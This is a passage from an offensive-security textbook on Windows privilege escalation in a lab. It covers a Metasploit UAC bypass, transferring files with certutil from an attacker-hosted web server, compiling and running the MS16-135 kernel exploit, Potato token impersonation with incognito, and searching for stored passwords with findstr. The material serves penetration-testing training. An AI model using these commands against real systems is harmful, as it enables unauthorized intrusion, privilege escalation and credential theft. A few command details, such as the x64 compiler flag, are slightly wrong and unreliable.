This kernel exploit module will bypass User Access Control (UAC) and insert a command in the Windows Registry that will be executed when the Windows Event Viewer is launched and will spawn a system shell – in this case, a Meterpreter session.

Note

This exploit does not exploit a vulnerability in the kernel, as it interacts and stores commands in the Windows Registry.

More information regarding this exploit module can be found here: https://www.rapid7.com/db/modules/exploit/windows/local/bypassuac_eventvwr/.

After loading the module, you will need to set the module options, which will include the Meterpreter session ID and the payload options for the new Meterpreter session as highlighted in the following screenshot:

Figure 5.5 – Kernel exploit module options

We can now run the kernel exploit module by running the following command:

exploit

In this case, the exploit is successful, as seen in the following screenshot. As a result, we will get a Meterpreter session with elevated privileges:

Figure 5.6 – Exploit successful

We can now enumerate the privileges we have on the system by running the following command:

getuid

The output is as shown in the following screenshot:

Figure 5.7 – Meterpreter privileges

As shown in the preceding screenshot, we do not yet have elevated privileges, however, we can list out the privileges we have on the current Meterpreter session by running the following command:

getprivs

The output is as shown in the following screenshot:

Figure 5.8 – Meterpreter privileges

As shown in the preceding screenshot, this Meterpreter session has administrative privileges and we can migrate to an NT AUTHORITY/SYSTEM process.

We can enumerate the running processes by running the following command:

ps

This command will output a list of running processes, their respective process IDs, and the process owner, as shown in the following screenshot:

Figure 5.9 – Meterpreter processes

We can migrate to the winlogon.exe process as it is owned by the NT AUTHORITY/SYSTEM user. This can be done by running the following command:

migrate <PID>

After successful migration, we can recheck our privileges by running the getuid command or the whoami command within a system shell:

Figure 5.10 – Successful privilege escalation

As shown in the preceding screenshot, we have successfully elevated our privileges and can run system commands and access any resource on the system.

We now have elevated privileges on the system and can begin performing post-exploitation procedures. It is recommended to set up persistence for the elevated Meterpreter session in the event the process is killed or the system is shut down.

This process will differ depending on the type of exploit module and the type of attack being performed, however, the process will remain similar when using the Metasploit framework.

The kernel exploitation process with Metasploit is much more streamlined as a lot of the steps can be automated, however, you might be in a situation where you only have access via a standard shell as opposed to a Meterpreter session. This is where manual kernel exploitation comes into play.

Manual kernel exploitation

In some cases, you will not have access to a target with a Meterpreter session or you may have exploited the target through a manual exploitation technique such as a web shell. In that event, you will have access through a standard reverse shell most likely facilitated through netcat. This poses a few issues; how can I scan the target for potential kernel exploits? And how can I transfer over the kernel exploit to the target?

These are the issues we will be addressing in this section; our target of choice will be the Windows 7 virtual machine.

Local enumeration

The first step is to scan and identify potential kernel vulnerabilities. This can be done through the use of the Windows-Exploit-Suggester tool or other enumeration scripts and tools. In this case, we will utilize the winPEAS binary to enumerate information from our target.

Note

winPEAS is a local Windows enumeration script that searches and scans for potential vulnerabilities and enumerates all important system information that can be used to stage a privilege escalation attack.

The winPEAS binary can be downloaded from the GitHub repository here: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe.

Ensure you download the correct binary based on the architecture of your target operating system; the architecture-specific binaries can be found in the binaries folder as highlighted in the following screenshot:

Figure 5.11 – winPEAS binaries

After downloading the binary to our Kali VM, we need to transfer the winPEAS.exe binary to our target virtual machine. This cannot be done automatically as we do not have a Meterpreter session. As a result, we will need to make use of Windows-specific utilities to download the binary.

Transferring files

In order to transfer the winPEAS.exe binary to our target, we will need to set up a web server on our Kali VM that will be used to host the binary so that we can download it on the target system. This can be done by following the procedure outlined here:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the winPEAS.exe binary is stored:

sudo python -m SimpleHTTPServer 80

Note

SimpleHTTPServer is a Python module for both Python 2 and Python 3.

As highlighted in the following screenshot, the SimpleHTTPServer module will serve the files in the directory on the Kali VM IP address on port 80:

Figure 5.12 – SimpleHTTPServer

In order to download the winPEAS.exe binary onto the target system, we can utilize the certutil utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the current user's desktop as illustrated in the following screenshot:

Figure 5.13 – Default user directory

We can now use the certutil utility to download the binary from the Kali VM to our target system. This can be done by running the following command on the target system:

certutil -urlcache -f http://<KALI-VM>/winPEASx64.exe winPEAS.exe

The output for this command can be seen in the following screenshot:

Figure 5.14 – certutil successful transfer

As shown in the preceding screenshot, if the transfer is successful, the binary should be downloaded and saved with the name we specified.

We can now use the winPEAS binary to enumerate potential kernel vulnerabilities that we can use to elevate our privileges.

Enumerating kernel exploits

The winPEAS binary enumerates a lot of information and will perform various checks to discover potential vulnerabilities. In the context of kernel exploits, we only need to enumerate the system information. This can be done by going through the procedure outlined as follows:

To enumerate all important system information, we need to run the winPEAS.exe binary with the following parameter:

.\winPEAS.exe systeminfo

As shown in the following screenshot, the binary will enumerate system information and, based on the build version and the hotfixes installed, it will output a list of kernel exploits that can be used to elevate privileges:

Figure 5.15 – winPEAS kernel exploits

We can also utilize the Windows-Exploit-Suggester tool to enumerate our system information and scan for potential kernel exploits. This can be done by running the following command:

./windows-exploit-suggester.py -–database <database>.xlsx -–systeminfo <systeminfo>.txt

The Windows-Exploit-Suggester script can be downloaded from this link: https://github.com/AonCyberLabs/Windows-Exploit-Suggester.

As outlined in the following screenshot, the script will enumerate all potential kernel exploits that can be used to elevate privileges. We can now use this information to determine the correct kernel exploit to use:

Figure 5.16 – Windows-Exploit-Suggester kernel exploits

It is always recommended to use the first exploits output by the enumeration tools and scripts. In this case, we will start off with the MS16-135 kernel exploit. We will need to determine more information about the exploit and how it should be used. We can do this by performing a quick Google search as highlighted in the following screenshot:

Figure 5.17 – MS16-135 exploit search

The Google search reveals a GitHub repository that contains information regarding the exploit, the exploit source code, and how it should be used.

It is always recommended to analyze the source code to ensure that it is not malicious and works as intended to make any additional modifications required. Let's take a look at how to compile a Windows exploit from source.

Compiling Windows exploits

The ability to modify and compile exploits is extremely important as it allows you to ensure the exploit works as intended and provides you with the flexibility to make modifications to the exploit as per your requirements. In this case, we will be taking a look at how to compile the exploit code into a binary manually:

To begin with, we must ensure that our Kali Linux VM has all the necessary build tools required for compiling Windows binaries. This can be done by running the following command:

sudo apt install mingw-w64

You will now need to download the exploit code to the Kali VM. This can either be done directly or through the wget utility as follows:

wget https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS16-135/41015.c

We can now begin the compilation process, however, based on the target system's architecture, we will need to compile the source code differently.

For x64-based operating systems, run the following command, and substitute the parameters with your own files and output names:

i686-w64-mingw32-gcc exploit.c -o exploit.exe

If the target is a 32-bit system, run the following command:

i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32

This will compile the exploit into a binary that we can then transfer over to our target to be executed.

Running the kernel exploit

After successful compilation of the exploit code, we can transfer over the compiled binary to the target system and execute it based on the instructions provided in the documentation of the exploit. This can be done by following the procedures outlined as follows:

In this particular case, the execution of the kernel exploit binary is straightforward and only requires the specification of the target operating system version. Before we can execute it, we need to transfer the exploit over to the target. This can be done by starting a local web server on the Kali VM with the SimpleHTTPServer Python module:

sudo python -m SimpleHTTPServer 80

In order to download the binary onto the target system, we can utilize the certutil utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the current user's desktop as shown in the following screenshot:

Figure 5.18 – Default user directory

We can now use the certutil utility to download the binary from the Kali VM to our target system. This can be done by running the following command on the target system:

certutil -urlcache -f http://<KALI-VM>/exploit.exe exploit.exe

We can now run the exploit binary by executing it on the target as follows:

.\exploit.exe

The output of the preceding command is shown in the following screenshot:

Figure 5.19 – Exploit options

As highlighted in Figure 5.19, the exploit requires the user to specify the target operating system. This can be done by executing the exploit with the following option:

.\exploit.exe 7

After running the exploit with the operating system specified, it will take a few seconds to complete, after which we should have an elevated shell with nt authority\system privileges:

Figure 5.20 – Manual kernel exploit successful

As highlighted in the preceding screenshot, the exploit ran successfully and elevated our privileges automatically.

We are now able to successfully run Windows kernel exploits both manually and automatically and can begin exploring other privilege escalation vectors.

Summary

In this chapter, we got started with identifying and running kernel exploits automatically with the Metasploit framework. We then looked at how to identify, compile, and transfer kernel exploits manually. We then ended the chapter with how to execute kernel exploits on the target system successfully in order to elevate our privileges on the target system.

Now that we have learned how to perform kernel exploitation on Windows, we can begin exploring other privilege escalation vectors.

In the next chapter, we will explore impersonation attacks on Windows and how they can lead to successful privilege escalation.

===== FILE 12/21: B17389_06_Final_PG_ePub.xhtml =====

Chapter 6: Impersonation Attacks

Now that you have got your hands dirty with the privilege escalation process on Windows, we can begin exploring other attack vectors that can be exploited to elevate our privileges. In this chapter, we will be taking a closer look at Windows access tokens, how they work, and how they can be leveraged to elevate our privileges through impersonation attacks.

The practical demonstrations in this chapter will primarily be focused on how to enumerate privileges on a system to determine whether it is vulnerable to impersonation attacks and how to generate or impersonate a privileged Windows access token that can be used to elevate our privileges.

We will also look at how to use various built-in meterpreter modules to automate the token impersonation process on a target system.

In this chapter, we're going to cover the following main topics:

Understanding Windows access tokens
Enumerating privileges
Token impersonation attacks
Escalating privileges via a Potato attack
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you meet the following technical requirements:

Familiarity with Windows CMD commands
Basic understanding of Windows access tokens

You can view this chapter's code in action here: https://bit.ly/3kWPSch

Understanding Windows access tokens

We took a brief look at how Windows access tokens work in the first chapter of the book and should have a general idea of how they can be abused to elevate privileges. This section will dive deeper into how they work and their role in the authentication process on Windows.

The first step is to revisit the function Windows access tokens play in authentication, how they work, and the various security levels that can be assigned to tokens.

Windows access tokens

Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).

A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network without having to provide credentials each time a process is started or a system resource is accessed.

Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.

Token security levels

Given the fact that access tokens are used to provide specific access to users based on their privileges, Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.

An access token will typically be assigned one of the following security levels:

Anonymous
Identify
Impersonate
Delegate

The two main security levels we will be encountering and leveraging are impersonate and delegate as they can be abused to elevate our privileges on a system.

Impersonate tokens

Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.

Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.

Delegate tokens

Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as Remote Desktop Protocol (RDP).

Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

Now that we have an idea of how access tokens work and the various security levels associated with them, we can look at how they are abused to elevate privileges on a system.

Abusing tokens

The process of abusing tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access.

In order to fully understand how to leverage the delegate and impersonate access tokens to elevate our privileges, we will need to explore the specific Windows privileges that are required to perform an impersonation attack.

The following are the privileges that are required for a successful impersonation attack:

SeAssignPrimaryToken: This allows a user to impersonate tokens using exploit tools such as rottenpotato.exe.
SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges.

More information regarding the specific Windows privileges and their potential impact in terms of impersonation attacks can be found here: https://github.com/gtworek/Priv2Admin.

Now that we understand how access tokens work on Windows, the various security levels associated with tokens, and the specific privileges required to launch a successful impersonation attack, we can begin the token impersonation process by taking a look at how to enumerate the privileges associated with our account on the target system.

In this chapter, we will be using Windows 7 SP1 virtual machine that we had set up in our virtual hacking lab.

We can now begin the process of enumerating privileges in order to determine whether we can perform an impersonation attack on the target.

Enumerating privileges

To perform the privilege enumeration process, you will need to ensure that you have access to your target system either through a command shell or a meterpreter session. We will be taking a look at how to use various techniques that will apply to both methods of access. To begin the privilege enumeration process, follow the outlined procedures:

The first step is to identify the user account you are currently utilizing. This can be done by running the following command in meterpreter:

getuid

If you do not have access to the target via a meterpreter session, you can run the following command in the command shell:

whoami

As highlighted in the following screenshot, this will output the current user you are logged in as; in this case, we are logged in as a regular user:

Figure 6.1 – Enumerating current user

The next step involves enumerating the user privileges, this can be done by running the following command in meterpreter:

getprivs

Alternatively, if you are utilizing a command shell, you can run the following Windows command in the command prompt:

whoami /priv

This will output a list of privileges assigned to the user account. We are primarily interested in identifying the following privileges that can be abused:

SeAssignPrimaryToken: This allows a user to impersonate tokens using exploit tools such as rottenpotato.exe.
SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges:

Figure 6.2 – Enumerating privileges with meterpreter

As highlighted in the preceding screenshot, we are able to identify the SeImpersonatePrivilege privilege. This privilege can be used to create a process under the security context of another user typically with administrative privileges:

Figure 6.3 – Enumerating privileges CMD

As highlighted in the preceding screenshot, the Windows command will also provide information regarding the privilege; in this case, the SeImpersonatePrivilege privilege allows us to impersonate a client after authentication.

If the account does not have any of the privileges outlined here, you will not be able to perform an impersonation attack successfully. As a result, you will need to identify another potential attack vector.

We have now been able to successfully enumerate the privileges of the user account we are logged in as and can begin performing the token impersonation attack.

Token impersonation attacks

Token impersonation attacks leverage specific Windows privileges such as SeImpersonatePrivilege to obtain an access token with administrative privileges that we can use to impersonate in order to elevate our privileges.

This process will depend on the version of Windows you are targeting and can be performed through various techniques.

The technique we will be focusing on is known as the Potato attack. This attack has some variations that alter the exploitation process; however, the core principles of the exploitation process remain the same. To fully understand how to successfully impersonate tokens, we will need to take a closer look at how the Potato attack works.

Potato attacks overview

The Potato attack is the name given to a Windows privilege escalation technique that exploits known issues in Windows such as the NTLM relay (specifically the HTTP – SMB relay), NetBIOS Name Service (NBNS) spoofing, WPAD, and Windows Update.

This technique allows attackers to elevate privileges on a Windows system from an account with the lowest privileges to an account with the highest privilege available, namely NT AUTHORITY/SYSTEM.

Because the exploitation process involves leveraging NTLM authentication, we need to get an understanding of how NTLM authentication works.

NTLM authentication

NT LAN Manager (NTLM) is a collection of authentication protocols utilized in Windows to facilitate authentication between computers. The authentication process involves the use of a valid username and password to authenticate successfully.

NTLM authentication operates under the client-server model of communication and involves a handshake process similar to the TCP 3-way handshake.

The authentication process utilizes three types of messages that are used to establish successful authentication:

Negotiation
Challenge
Response

The following figure illustrates the NTLM authentication process as a whole and the handshake process between the client and the server:

Figure 6.4 – NTLM authentication process

Now that we have a basic idea of how NTLM authentication works, let's explore the steps involved in the handshake process in greater detail:

The client initiates the connection by sending an authentication request to the server; the authentication request includes a username for authentication.
The server responds to the request with an NTLM challenge, typically a random number.
The client receives the challenge response and generates a hash of the challenge number and the user's password and sends it back to the server.
The server already knows the user's password and generates a hash of the password to compare it to the hash that was sent back by the client.
If the hashes match, the authenticity of the client and consequently the user is verified and access is granted; if there is a mismatch, access will be denied.

The nature of the NTLM authentication handshake makes it vulnerable to man-in-the-middle attacks, which can be used to perform impersonation attacks.

You should now have an understanding of how NTLM authentication works, and we can now explore the various variations of the Potato attack that can be used.

Hot Potato attack

The Hot Potato attack involves various steps that leverage the NTLM relay (specifically the HTTP=>SMB relay), WPAD, NetBIOS name server, spoofing, and Windows Update. The attack works as follows:

The first step involves flooding the target with fake NBNS response packets for our fake WPAD proxy server that we will set up on 127.0.0.1:80. This will redirect HTTP traffic on the target system to our server.
The next step involves starting Windows Update as NT AUTHORITY/SYSTEM.
By default, Windows Update will automatically find the network proxy setting configuration by requesting the URL http://wpad/wpad.dat&#8221. This is where the fake WPAD proxy server comes in place. If a proxy exists, it will be used. Given that we have flooded our target with packets containing the address of our fake proxy, Windows Update will use the fake proxy, therefore allowing us to intercept the privileged NTLM authentication requests.
The fake WPAD proxy authenticates via the NTLM SMB relay and obtains the NTLM security challenge. The security challenge is then forwarded to Windows Update.
Windows Update sends back the NTLM response, which will be intercepted by the fake WPAD proxy.
The final step involves using the NTLM response for authentication via SMB.

More information regarding the Hot Potato attack can be found here: https://foxglovesecurity.com/2016/01/16/hot-potato/

Rotten Potato attack

The Rotten Potato attack involves three main steps that leverage the NTLM relay to negotiate a security token for NT AUTHORITY/SYSTEM. The attack works as follows:

The first step involves tricking an NT AUTHORITY/SYSTEM account into authenticating via NTLM using a TCP endpoint that we operate.
The authentication process can be facilitated by setting up a man-in-the-middle attack to locally negotiate a security token from an NT AUTHORITY/SYSTEM account.
The final step involves impersonating the token we have just negotiated. This requires our account to have the SeImpersonatePrivilege privilege.

The Rotten Potato attack is an improved variation of the Hot Potato attack, which also leverages the NTLM relay, NBNS spoofing, WPAD, and Windows Update. The Rotten Potato attack is much more efficient and provides a greater degree of success as it does not rely on the Windows Update process.

More information regarding the Rotten Potato attack can be found here: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/.

Now that we understand how the various Potato attacks work, we can begin the token impersonation process on our target system.

Escalating privileges via a Potato attack

In this section, we will be exploring the various tools and techniques that can be utilized to perform token impersonation via the Potato attack. As mentioned in the previous section, the success of Potato attacks will depend on the version of Windows the target is running and whether services such as WPAD are running or if NTLMv2 hashes are being used.

We can begin the process by following the outlined procedures:

The first step involves performing system enumeration to identify any potential privilege escalation vectors that can be exploited through the Potato attack. This can be done using an automated enumeration script; in this case, we will utilize the Windows exploit suggester script:

./windows-exploit-suggester.py --database <Database>.xlsx --systeminfo <Systeminfo>.txt

As highlighted in the following screenshot, this will output a list of potential privilege escalation vulnerabilities, in this case, we are only interested in Potato exploits that can lead to privilege escalation:

Figure 6.5 – Windows exploit suggester results

In this example, we can identify a potential privilege escalation attack vector that can be exploited through the Hot Potato and Rotten Potato attacks:

Figure 6.6 – MS16-075 Metasploit module

As shown in the preceding screenshot, additional research regarding the MS16-075 exploit reveals a Metasploit module that we can use to perform the Potato attack automatically.

We can load the module in Metasploit by running the following command:

use exploit/windows/local/ms16_075_reflection

Ensure that you have put your meterpreter session in the background before loading the module.

After loading the module, we can explore the module options by running the following command in the Metasploit console:

show options

You will also need to specify the default shell to be used; in this case, we will be utilizing a meterpreter shell compatible with x64-based operating systems. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

As highlighted in the following screenshot, the module options you will need to modify are LHOST, LPORT, and the SESSION ID. Additionally, the module options should also reflect the default shell we had specified in the previous step:

Figure 6.7 – Module options and default payload

After configuring the module options, we can run the exploit module by running the following command:

run

If the exploit is successful, you should get a new meterpreter session as highlighted in the following screenshot:

Figure 6.8 – Exploit successful

The next step involves performing the impersonation process and can be automated using a built-in meterpreter module called incognito. The module can be loaded by running the following command:

load incognito

If the module is successfully loaded, you should get a message similar to the one highlighted in the following screenshot:

Figure 6.9 – Loading incognito

Note

incognito is a built-in meterpreter module that was originally a standalone application that allows you to impersonate user tokens after successful exploitation.

We can now use incognito to display a list of tokens available that we can impersonate. This can be done by running the following command in meterpreter:

list_tokens -u

As highlighted in the following screenshot, this will list all available user tokens that we can impersonate to elevate our privileges. In this case, we are able to identify the NT AUTHORITY/SYSTEM access token with the delegate security level:

Figure 6.10 – Listing tokens

The next step involves the actual impersonation. This can be done through incognito by running the following command:

impersonate_token "NT AUTHORITY\SYSTEM"

If the impersonation process is successful, you should receive a message similar to the one highlighted in the following screenshot:

Figure 6.11 – Successful impersonation

We can now verify the impersonation attack process by enumerating our current user and privileges. This can be done by running the following command in Meterpreter:

getuid

As highlighted in the following screenshot, we should now have NT AUTHORITY/SYSTEM privileges on the target system and should have successfully elevated our privileges:

Figure 6.12 – User enumeration

Now that we have learned how to perform impersonation attacks automatically using Metasploit modules, we can also explore how to perform Potato attacks manually.

Manual escalation

The manual escalation process will entail the use of exploit binaries that require manual compilation, transfer, and execution. After executing the exploit binary, we will utilize meterpreter modules such as incognito to list the available tokens and impersonate a privileged access token to elevate our privileges:

Like the previous section, the first step involves performing system enumeration to identify any potential privilege escalation vectors that can be exploited through the Potato attack. This can be done using an automated enumeration script, in this case, we will utilize the Windows exploit suggester script:

./windows-exploit-suggester.py --database <Database>.xlsx --systeminfo <Systeminfo>.txt

As highlighted in the following screenshot, this will output a list of potential privilege escalation vulnerabilities. In this case, we are only interested in Potato exploits that can lead to privilege escalation:

Figure 6.13 – Windows exploit suggester results

In this example, we can identify a potential privilege escalation attack vector that can be exploited through a Rotten Potato attack.

We can navigate to the GitHub reference URL outlined in Figure 6.13 to learn more about the exploit and how it can be used.

As highlighted in the following screenshot, the GitHub repository provides us with the exploit source code and a pre-compiled executable that we can use:

Figure 6.14 – RottenPotato GitHub repository

The GitHub repository also provides us with usage procedures for the exploit and the requirements, as highlighted in the following screenshot:

Figure 6.15 – RottenPotato usage

In this case, we will be using the pre-compiled executable; it is, however, recommended to analyze the source code and compile it manually to modify the parameters based on your requirements and avoid any security issues.

After downloading the pre-compiled exploit, we will need to transfer it to the target system. To transfer the rottenpotato.exe binary to our target, we will need to set up a web server on our Kali virtual machine that will be used to host the binary so that we can download it on the target system. This can be done by following the procedures outlined here.

To set up a web server on our Kali virtual machine, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the rottenpotato.exe binary is stored:

sudo python -m SimpleHTTPServer 80

Alternatively, you can also utilize the Python3 http.server module by running the following command:

sudo python3 -m http.server 80

As highlighted in the following screenshot, SimpleHTTPServer will serve the files in the directory on the Kali virtual machine IP address on port 80:

Figure 6.16 – SimpleHTTP server directory

To download the rottenpotato.exe binary onto the target system, we can utilize the certutil utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the current user's desktop as illustrated in the following screenshot:

Figure 6.17 – Default user directory

We can now use the certutil utility to download the binary from the Kali virtual machine to our target system. This can be done by running the following command on the target system:

certutil -urlcache -f http://<KALI-VM-IP>/rottenpotato.exe rottenpotato.exe

Alternatively, we can also use meterpreter to upload the rottenpotato.exe binary. This can be done by running the following command:

upload /<BINARY-LOCATION>/rottenpotato.exe

The next step as per the usage procedures outlined is to load the incognito module in meterpreter. This can be done by running the following command:

load incognito

After loading the incognito module, we can now execute the rottenpotato.exe binary. This can be done by launching a shell session in meterpreter by running the following command:

shell

After launching a shell session on the target, we can execute the rottenpotato.exe binary by running the following command:

.\rottenpotato.exe

If the exploit is successful, you should receive a message like the one highlighted in the following screenshot:

Figure 6.18 – RottenPotato exploit successful

We can now terminate the shell session and return to the meterpreter session and list out the access tokens available for impersonation. This can be done by running the following command:

list_tokens -u

As highlighted in the following screenshot, this will list out all available user tokens that we can impersonate to elevate our privileges. In this case, we are able to identify the NT AUTHORITY/SYSTEM access token with the delegate security level:

Figure 6.19 – Listing tokens

The next step involves the actual impersonation. This can be done through incognito by running the following command:

impersonate_token "NT AUTHORITY\SYSTEM"

If the impersonation process is successful, you should receive a message like the one highlighted in the following screenshot:

Figure 6.20 – Successful impersonation

We can now verify the impersonation attack process by enumerating our current user and privileges. This can be done by running the following command in Meterpreter:

getuid

As highlighted in the following screenshot, we should now have NT AUTHORITY/SYSTEM privileges on the target system and should have successfully elevated our privileges:

Figure 6.21 – User enumeration

We have now been able to elevate our privileges through token impersonation attacks both through Metasploit modules and manually through exploit binaries.

Summary

In this chapter, we got started with understanding how Windows access tokens work and the various security levels associated with them. We then looked at how to enumerate privileges on our target system through the use of automated and manual tools in order to identify whether it is vulnerable to a token impersonation attack. We then ended the chapter by taking an in-depth look at how to perform token impersonation attacks via the Potato attack both automatically and manually.

In the next chapter, we will look at how to search for stored credentials and hashes to elevate our privileges.

===== FILE 13/21: B17389_07_Final_PG_ePub.xhtml =====

Chapter 7: Windows Password Mining

An important privilege escalation attack vector that usually goes unexplored is the process of searching for locally stored credentials on the target system. This process involves searching for specific passwords and password hashes that can then be used to elevate privileges directly, without the use of any exploits.

This chapter will focus on the process of searching for passwords and dumping password hashes on the target system by using various utilities and techniques.

We will also take a look at how Windows NT LAN Manager (NTLM) hashes can be cracked and utilized to elevate privileges on a target system.

In this chapter, we're going to cover the following main topics:

What is password mining?
Searching for passwords in files
Searching for passwords in Windows configuration files
Searching for application passwords
Dumping Windows hashes
Cracking Windows hashes
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you are familiar with Windows CMD commands.

You can view this chapter's code in action here: https://bit.ly/3ogOyCN

What is password mining?

Password mining is the process of searching for and enumerating encrypted or cleartext passwords stored in persistent or volatile memory on the target system. The primary objective of this process involves identifying potentially useful user accounts and application passwords, which can then expand our authority over a target system and potentially provide us with elevated privileges.

Given the nature of Windows configurations and deployment use cases, this process will differ from target to target. Therefore, it is important to have a good understanding of how and where passwords, both encrypted and cleartext, are stored on Windows.

It is also important to understand that this process relies on a series of vulnerabilities that are a result of an organization's or individual's password security practices. Poor password security practices are the primary target for attackers as they provide a straightforward access vector, without the need for further system exploitation or compromise.

Because of the amount of credentials that are required by various platforms and applications, employees and individuals are prone to saving their credentials on their systems in cleartext, usually in .doc, .txt, or .xlsx files for ease of access, and are more likely to use weaker passwords that comprise events, names, or dates that are relevant to them. This is a significant threat to the security of an organization and as a result, most organizations enforce a password security policy as a means of remediating these issues.

Password security policies are used to establish a baseline security level for user account passwords and enforce the secure storage and use of stronger passwords that comprise words (both uppercase and lowercase), symbols, and numbers with a recommended minimum length of 8 digits. However, this gives rise to the occurrence of password reuse, where employees and individuals are likely to reuse the same password for multiple accounts, primarily because of the complex nature of the passwords they are required to use. This allows attackers to gain access to multiple accounts by compromising a single password.

An additional security vulnerability or risk involves Windows user account passwords and how they are stored. Windows encrypts and stores user account passwords locally and in memory. After initial access has been obtained by an attacker, user account hashes can be dumped from memory and can be cracked, depending on the length and strength of the password. We will explore the advantages and drawbacks of this technique later in this chapter.

From an organizational standpoint, Windows is also used to host third-party, business-critical applications that come with their own security vulnerabilities. Most of these applications implement some form of access control and, consequently, require user authentication in the form of a username and password combination. These applications are also prone to storing credentials locally in either cleartext or in encrypted format. After successfully exploiting an application, attackers can locate these credentials, decrypt them (if they're weak), and use them to gain access to the application and, consequently, expand their domain of control over a system or network.

In this chapter, we will be using the Metasploitable3 target virtual machine that we set up in Chapter 2, Setting Up Our Lab.

Metasploitable3 is an intentionally vulnerable virtual machine that runs on Windows Server 2008 R2 and hosts a plethora of applications, from web apps to databases.

This robust configuration of applications provides a great real-world scenario for a practical demonstration of the tools and techniques that we will be using in this chapter.

Before we begin, ensure that you have a foothold of the target system and have access through a command shell or meterpreter session.

The techniques and tools that will be used in this chapter will involve utilizing native Windows commands and specific meterpreter modules, to help automate various aspects of the password mining and dumping process.

Searching for passwords in files

The first step of this process involves searching for passwords in various files stored locally. This will allow us to identify any user or application passwords in text or configuration files. This can be achieved by using built-in Windows utilities that allow us to search for specific strings in files with specific extensions.

We will begin this process by following the different procedures outlined here:

The first step involves searching the local filesystem for a specific string. In this case, the string we will be searching for is password. This will enumerate all occurrences of the string, their values, and their respective filenames and locations. This can be done by running the findstr utility in the Windows command shell:

findstr /si password *.txt

This command will perform a case-sensitive search for the password string in all subdirectories.

Note

findstr is a Windows utility that is used to search for strings in files and can be used in conjunction with various regular expressions to fine tune your searches.

To perform a thorough search, it is recommended to run the findstr utility at the root of the Windows filesystem. This can be done by navigating to the C:\\ directory and initiating the search from there.

This will output a list of all .txt files that contain the password string, as illustrated in the following screenshot:

Figure 7.1 – findstr results

The command will output a lot of information based on the configuration of the system and the number of applications that have been installed. As a result, it is recommended to output the results to a file for in-depth analysis as the results can be tedious to analyze manually.

We can also use the findstr utility to search for the password string in *.xml files. This can be done by running the following command:

findstr /si password *.xml

As shown in the following screenshot, this will output a list of all occurrences of the password string in .xml files.

You can also fine-tune your search to limit the results to the files that contain occurrences of the string by running the following command:

findstr /si /m "password" *.xml *.ini *.txt

This will limit the output of the search to the files that have the string specified in the search query:

Figure 7.2 – finstr XML results

We can also perform a comprehensive search for a specific string in all the files and directories on the target system. This can be done by running the following command:

findstr /spin "password" *.* -

This command will output all files, regardless of their formats or extensions, that have occurrences of the password string within them.

Based on the deployment use case of the target, you may receive a lot of matches for the password string or none at all. We will take a closer look at how to fine-tune our searches based on the type of password we are looking for in the next section.

We can also search for various strings in files by using the dir command on Windows. This can be done by running the following command:

dir /s *pass* == *cred* == *vnc* == *.config*

As shown in the following screenshot, the command will output all occurrences of the strings specified and their respective locations. This particular scan is much more comprehensive and has a higher probability of returning useful and actionable results:

Figure 7.3 – Directory search results

As highlighted in the preceding screenshot, the search reveals the location of files that contain the strings specified in the search. In this particular case, we can identify the location of the local and domain passwords for the GlassFish server. We can use these credentials to take control of the service.

We will take a closer look at how to search for application-specific passwords in the upcoming sections and how they can be used to elevate our privileges.

Now that we know how to search for useful strings in files on the target system, we will take a look at how to search for passwords in Windows configuration files.

Searching for passwords in Windows configuration files

Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems. An example of this is the Unattended Windows Setup utility, which automates the mass installation of Windows. This tool utilizes configuration files that contain specific configurations and user account credentials that can be used by attackers to elevate privileges. In this section, we will be taking a look at how to search for and identify the configuration files that are used during the Unattended Windows Setup process.

It is important to note that this technique will vary based on the version of Windows being use, as well as whether Windows was installed using the Unattended Windows Setup utility. Given the typical use case of the Unattended Windows Setup utility, this method will be useful when it's employed in an organization-specific environment. However, you may run into individual systems that utilize the Unattended Windows Setup utility.

In our case, our target system was not set up and configured using the Unattended Windows Setup utility, so the following techniques will not be directly applicable. However, it is a vitally important aspect of the password mining process:

The first step involves searching for and identifying the Unattended Windows Setup configuration files that were left over. The names of the configuration file will vary based on the version of Windows that's been installed. The file typically has one of the following names:

- Unattend.xml

- Autounattend.xml

The location of the configuration file will also depend on the version of Windows that's been installed and can typically be found in one of the following locations:

C:\\Windows\Panther\Unattend\Unattended.xml

C:\\Windows\Panther\Unattdended.xml

As highlighted in the following Terminal output, if the configuration file exists, it should contain the Administrator password in cleartext or encoded in Base64 so that it can be decrypted to reveal the cleartext password:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">

